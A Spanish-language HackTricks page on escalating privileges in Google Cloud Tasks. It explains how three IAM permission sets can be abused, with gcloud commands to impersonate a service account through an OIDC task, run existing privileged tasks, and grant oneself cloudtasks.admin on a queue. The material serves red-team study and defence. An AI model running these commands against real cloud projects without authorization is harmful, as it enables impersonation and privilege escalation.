GCP - Cloud Tasks Privesc

Tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

Consulta los subscription plans!

Únete al 💬 Discord group o al telegram group o síguenos en Twitter 🐦 @hacktricks_live.

Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud github repos.

Cloud Tasks

`cloudtasks.tasks.create`, `iam.serviceAccounts.actAs`

Un atacante con estos permisos puede suplantar otras cuentas de servicio creando tareas que se ejecuten con la identidad de la cuenta de servicio especificada. Esto permite enviar solicitudes HTTP autenticadas a servicios de Cloud Run o Cloud Functions protegidos por IAM.

Crear Cloud Task con suplantación de cuenta de servicio

```bash gcloud tasks create-http-task \ task-$(date '+%Y%m%d%H%M%S') \ --location us-central1 \ --queue \ --url 'https://.us-central1.run.app' \ --method POST \ --header 'X-Hello: world' \ --body-content '{"hello":"world"}' \ --oidc-service-account-email @.iam.gserviceaccount.com ```

`cloudtasks.tasks.run`, `cloudtasks.tasks.list`

Un atacante con estos permisos puede ejecutar tareas programadas existentes sin tener permisos sobre la service account asociada con la tarea. Esto permite ejecutar tareas que fueron creadas previamente con service accounts con mayores privilegios.

Ejecutar Cloud Task existente sin el permiso actAs

```bash gcloud tasks run projects//locations/us-central1/queues//tasks/ ```

El principal que ejecuta este comando no necesita el permiso iam.serviceAccounts.actAs en la cuenta de servicio de la tarea. Sin embargo, esto solo permite ejecutar tareas existentes; no otorga la capacidad de crear o modificar tareas.

`cloudtasks.queues.setIamPolicy`

Un atacante con este permiso puede concederse a sí mismo u a otros principales roles de Cloud Tasks en colas específicas, escalando potencialmente a roles/cloudtasks.admin, que incluye la capacidad de crear y ejecutar tareas.

Conceder rol de administrador de Cloud Tasks en una cola

```bash gcloud tasks queues add-iam-policy-binding \ \ --location us-central1 \ --member serviceAccount:@.iam.gserviceaccount.com \ --role roles/cloudtasks.admin ```

Esto permite al atacante otorgar permisos completos de administrador de Cloud Tasks en la cola a cualquier cuenta de servicio que controlen.

Referencias

Google Cloud Tasks Documentation

Tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

Consulta los subscription plans!

Únete al 💬 Discord group o al telegram group o síguenos en Twitter 🐦 @hacktricks_live.

Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud github repos.

HackTricks Cloud

GCP - Cloud Tasks Privesc

Cloud Tasks

cloudtasks.tasks.create, iam.serviceAccounts.actAs

cloudtasks.tasks.run, cloudtasks.tasks.list

cloudtasks.queues.setIamPolicy

Referencias

`cloudtasks.tasks.create`, `iam.serviceAccounts.actAs`

`cloudtasks.tasks.run`, `cloudtasks.tasks.list`

`cloudtasks.queues.setIamPolicy`